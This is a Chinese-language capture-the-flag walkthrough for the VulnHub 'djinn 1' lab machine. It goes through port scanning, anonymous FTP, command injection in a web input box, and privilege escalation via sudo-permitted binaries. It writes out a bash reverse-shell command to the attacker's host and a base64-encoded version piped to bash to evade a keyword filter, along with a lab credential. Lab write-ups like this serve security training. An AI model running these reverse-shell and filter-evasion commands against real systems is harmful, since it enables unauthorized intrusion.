通关靶机djinn1

0x00靶机下载

下载连接: https://www.vulnhub.com/entry/djinn-1,397/
目标是拿到user.txt和root.txt的flag

0x01:发现靶机

首先打开靶机以后会出现靶机的IP

用netdiscover验证一下，存在该IP

0x02:探测靶机

开始用nmap扫描端口，发现开了4个端口同时21端口支持匿名访问
命令:nmap -A -sS -sV -v -p- 192.168.184.136

-A=全面扫描
-v=可以列出扫描过程中的详细信息
-p-=端口扫描顺序
-sS=TCP SYN扫描
-sV=版本探测

开始用ftp登录 用户名:Anonymous 密码:空 ls一波发现几个文件用get(下载)到本地

然后再用cat打印出来，得到几个关键信息 nitu:81299 port 1337和@nitish81299

这里访问了1337端口发现出了问题

换成nc连接成功，不过这里有个很坑的地方就是要答1000题加减乘除题做了几百题以后神志不清填错一个直接退出程序放弃。

0x03:漏洞挖掘

拜访另外一个端口，返回一个正常的页面

那么开始用dirb跑，最后跑出两个页面，一个是403一个是一个输入框

这里把注意力放到输入框这里，输入whoami会返回一个www-data猜测是当前用户。然后输入ifconfig会返回IP信息，那么这里存在命令执行漏洞

这里有个想法先用nc开启一个kali的端口然后在输入框里面塞一个bash进去
先开启本地一个端口

然后在输入框里面输入一个shell命令
bash -i >& /dev/tcp/192.168.184.128/5555 0>&1

然而翻车了，提示wrong choice of words

回到刚才输入whoami那里，如果输入echo whoami会出现一个%0A的东西出来，这里猜测可能用了某些编码

这里试了一下主流编码类型当用BASE64编码的时候会正常返回内容不会出现%0A,而且bash命令也可以正常运行
命令: echo J3dob2FtaSc=| base64 -d

所以可以构造一条语句，记得先开启本地端口，这里我换了8080端口
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE4NC4xMjgvODA4MCAwPiYx | base64 -d | bash

成功获得shell

0x04:挖掘信息

先ls一波，然后打开其中当前目录下的一个文件发现还指向到另外一个文件

继续跟进得到一串可能是账号密码的东西
nitish:p4ssw0rdStr3r0n9

然后开始用su 切换账号输入刚才的账号密码成功登录，直接去到/home/nitish目录下得到第一个flag

0x05提权

先sudo -l 一波，然后看到可以暂时让nitish用户获得root权限运行这个

跟进了一下查看了权限是-rwsr-x——是一个二进制文件。。。。。

运行了一下发现是个游戏

跟着它的命令输入一下

把genie传到本地在加上权限

用strings把文件打开(这里不要用cat 命令打开否则是乱码状态)

一直往下翻，翻到-cmd
想到一个方法 用sudo -u sam genie -cmd 命令 执行

这里输入ifconfig提示一个 my man 查看了当前用户变成了sam

0x06:继续挖掘信息

这里获得新用户以后先sudo -l 然而有个问题来了，虽然现在可以暂时作为root访问/root/lago然而连/root目录都进不了怎么访问子目录，所以挖掘其它信息

这里来到sam目录下发现一个.pyc文件这是一个Python编译好的东西不能直接打开

这里先把文件传到本地

然后需要安装一个uncompyle6来帮忙解译这个文件，这里我已经安装好了解译完成后直接cat可以查看到里面的内容

没有过多的提示，尝试一下sudo /root/lago成功进入游戏

这里面选择2以后直接输入num，因为根据上面的图它在骗你输入数字。但是如果输入Num直接跳出程序然后查看了一下直接到root权限

最后拿到flag，好像没有root.txt只有这个